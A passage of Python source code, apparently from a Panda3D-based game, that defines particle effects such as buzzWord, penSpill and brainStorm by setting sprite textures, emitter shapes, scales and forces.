p0.renderer.setInitialXScale(0.40)
p0.renderer.setFinalXScale(0.10)
p0.renderer.setInitialYScale(0.20)
p0.renderer.setFinalYScale(0.05)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(-5.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Surface parameters
p0.emitter.setRadius(1.5000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearJitterForce(37.2697, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def buzzWord(self):
self.reset()
self.setPos(0.000, 2.000, 3.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(7)
p0.setBirthRate(0.2000)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.0000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/buzzwords-crash")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.300)
p0.renderer.setFinalXScale(0.070)
p0.renderer.setInitialYScale(0.200)
p0.renderer.setFinalYScale(0.050)
p0.renderer.setNonanimatedTheta(20.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(8.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 7.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -3.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.0010)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearJitterForce(64.5449, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def penSpill(self):
self.reset()
self.setPos(0.000, 0.000, -0.600)
self.setHpr(0.000, 0.000, -90.000)
self.setScale(1.100, 1.100, 1.100)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(70)
p0.setBirthRate(0.1000)
p0.setLitterSize(2)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.5000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/raindrop")
p0.renderer.setColor(Vec4(0, 0, 0, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.05)
p0.renderer.setFinalXScale(0.000)
p0.renderer.setInitialYScale(0.05)
p0.renderer.setFinalYScale(0.000)
p0.renderer.setNonanimatedTheta(90.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(3.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -2.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.2282)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -99.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0100, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def fingerwag(self):
self.reset()
self.setPos(0.167, 0.692, 3.731)
self.setHpr(90.000, -36.310, -0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("PointEmitter")
p0.setPoolSize(250)
p0.setBirthRate(0.2000)
p0.setLitterSize(2)
p0.setLitterSpread(2)
p0.setSystemLifespan(2.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.6000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(410.7267)
p0.factory.setTerminalVelocitySpread(2.3816)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(0.86)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/blah")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.400)
p0.renderer.setFinalXScale(0.0200)
p0.renderer.setInitialYScale(0.200)
p0.renderer.setFinalYScale(0.0200)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPNOBLEND)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETEXPLICIT)
p0.emitter.setAmplitude(3.0000)
p0.emitter.setAmplitudeSpread(2.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Point parameters
p0.emitter.setLocation(Point3(0.0000, 0.0000, 0.0000))
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('jfo')
# Force parameters
force0 = LinearJitterForce(4.0000, 0)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearSourceForce(Point3(0.0000, 0.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 0.5000, 1.0000, 0)
force1.setActive(1)
f0.addForce(force1)
force2 = LinearSinkForce(Point3(0.0000, 1.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.0000, 1)
force2.setActive(1)
f0.addForce(force2)
self.addForceGroup(f0)
@particle
def doubleTalkRight(self):
self.reset()
self.setPos(0.000, 3.000, 3.000)
self.setHpr(-55.000, 0.000, 0.000)
self.setScale(3.000, 3.000, 3.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(2)
p0.setBirthRate(0.7000)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.7000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/doubletalk-good")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(1.5)
p0.renderer.setFinalXScale(1.5)
p0.renderer.setInitialYScale(1.5)
p0.renderer.setFinalYScale(1.5)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(12.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.6000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -8.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.0500)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(-6.000, -3.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.5000, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def filibusterSpray(self):
self.reset()
self.setPos(0.000, 3.000, 4.000)
self.setHpr(0.000, 55.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(1)
p0.setBirthRate(0.400)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.2700)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/filibuster-cut")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.3*1.5)
p0.renderer.setFinalXScale(0.75*1.5)
p0.renderer.setInitialYScale(0.15*1.5)
p0.renderer.setFinalYScale(0.25*1.5)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(5.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 8.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -1.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.1000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, -9.0000, -11.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.3661, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def fingerwag2(self):
self.reset()
self.setPos(0.228, 0.880, 4.314)
self.setHpr(-2.862, -36.310, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("RingEmitter")
p0.setPoolSize(250)
p0.setBirthRate(0.3000)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(2.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.6000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(410.7267)
p0.factory.setTerminalVelocitySpread(2.3816)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(0.86)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/blah")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.400)
p0.renderer.setFinalXScale(0.0200)
p0.renderer.setInitialYScale(0.200)
p0.renderer.setFinalYScale(0.0200)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPNOBLEND)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(1.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Ring parameters
p0.emitter.setRadius(1.0000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('jfo')
# Force parameters
self.addForceGroup(f0)
@particle
def schmoozeLowerSpray(self):
self.reset()
self.setPos(0.000, 6.600, 3.290)
self.setHpr(0.000, -55.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(1)
p0.setBirthRate(0.400)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.900)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/schmooze-master")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.7)
p0.renderer.setFinalXScale(0.07)
p0.renderer.setInitialYScale(0.35)
p0.renderer.setFinalYScale(0.07)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(5.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 11.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -1.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.1000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, -23.0000, 9.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.3661, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def brainStorm(self):
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("DiscEmitter")
p0.setPoolSize(70)
p0.setBirthRate(0.4)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/brainstorm-box")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.600)
p0.renderer.setFinalXScale(0.0400)
p0.renderer.setInitialYScale(0.30)
p0.renderer.setFinalYScale(0.0400 )
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(5.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 5.0000))
# Disc parameters
p0.emitter.setRadius(0.5000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearJitterForce(15.0000, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def numberSpray(self):
self.reset()
self.setPos(0.000, 2.700, 3.900)
self.setHpr(-180.000, 80.000, -180.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(1)
p0.setBirthRate(0.2000)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(2.1000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/fire")
p0.renderer.setColor(Vec4(0.00, 0.00, 0.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.125)
p0.renderer.setFinalXScale(0.5)
p0.renderer.setInitialYScale(0.2)
p0.renderer.setFinalYScale(1.0)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(5.1000)
p0.emitter.setAmplitudeSpread(2.5000)
p0.emitter.setOffsetForce(Vec3(0.0000, 9.1000, -4.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.500)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -3.5000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 2.5308, 1)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearVectorForce(Vec3(0.0000, -10.0000, 0.0000), 1.0000, 0)
force1.setActive(1)
f0.addForce(force1)
self.addForceGroup(f0)
@particle
def demotionUnFreeze(self):
self.reset()
self.setPos(0.000, 0.000, 3.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(2.000, 2.000, 2.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
#p0.setRenderer("PointParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
#p0.setEmitter("SphereSurfaceEmitter")
p0.setPoolSize(70)
p0.setBirthRate(0.0200)
p0.setLitterSize(10)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.5000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/roll-o-dex")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.04)
p0.renderer.setFinalXScale(0.000)
p0.renderer.setInitialYScale(0.04)
p0.renderer.setFinalYScale(0.000)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(4.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Surface parameters
p0.emitter.setRadius(0.6000)
self.addParticles(p0)
@particle
def fillWithLeadSmother(self):
self.reset()
self.setPos(0.000, 0.000, 3.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereSurfaceEmitter")
p0.setPoolSize(100)
p0.setBirthRate(0.0400)
p0.setLitterSize(20)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.5000)
p0.factory.setLifespanSpread(0.0300)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/mumbojumbo-iron")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.0100)
p0.renderer.setFinalXScale(0.0100)
p0.renderer.setInitialYScale(0.0100)
p0.renderer.setFinalYScale(0.0100)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(-5.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Surface parameters
p0.emitter.setRadius(1.1000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearJitterForce(37.2697, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def downsizeSpray(self):
self.reset()
self.setPos(0.000, 2.900, 3.400)
self.setHpr(0.000, 60.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(50)
p0.setBirthRate(0.1000)
p0.setLitterSize(7)
p0.setLitterSpread(2)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.3000)
p0.factory.setLifespanSpread(0.2000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/snow-particle")
p0.renderer.setColor(Vec4(1.00, 1.00, 0.00, 0.80))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.0750)
p0.renderer.setFinalXScale(0.0375)
p0.renderer.setInitialYScale(0.055)
p0.renderer.setFinalYScale(0.024)
p0.renderer.setNonanimatedTheta(20.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(4.9000)
p0.emitter.setAmplitudeSpread(0.3000)
p0.emitter.setOffsetForce(Vec3(0.0000, 7.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -3.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.0010)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -5.3000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 2.5308, 1)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearVectorForce(Vec3(0.0000, -7.0000, 0.0000), 1.0000, 0)
force1.setActive(1)
f0.addForce(force1)
